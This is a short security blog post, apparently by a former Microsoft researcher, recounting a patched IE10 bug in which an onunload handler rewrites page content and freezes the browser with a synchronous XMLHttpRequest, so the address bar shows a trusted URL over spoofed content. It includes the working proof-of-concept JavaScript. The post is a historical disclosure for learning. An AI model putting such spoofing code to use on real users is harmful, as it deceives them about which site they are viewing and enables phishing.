IE10: Content and Address Bar Spoof via onunload Sync XMLHttpRequest Freeze

I found that an onunload handler could replace the page’s content and then freeze the browser thread using a synchronous XMLHttpRequest to a never-responding server endpoint. This left the address bar showing the URL the user was navigating to while the visible page content had been replaced by attacker-controlled HTML — a combined content and address bar spoof.

window.onunload = function()
{
    document.body.innerHTML = "<h1>The content of this window has been spoofed!</h1> Check out the address-bar.";
    oXML = new XMLHttpRequest();
    oXML.open("GET", "sleep.aspx", false); // sleep.aspx never finishes its response.
    oXML.send(null); // Here the thread gets frozen, with the incorrect URL in the address-bar.
}

When the user typed a new URL in the address bar and pressed Enter, the onunload event fired, replaced the page body, and then issued a synchronous XHR to an endpoint that never sent a response. The thread froze: the address bar showed the destination URL the user typed, but the page displayed the spoofed content. More sophisticated variants could use postMessage or htmlFile ActiveX to interact with the frozen page.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 UXSS: Caching document.all from New Window Before Server Redirect] :: [IE10 Metro: Page Reload with Server Redirect Does Not Show Address Bar] >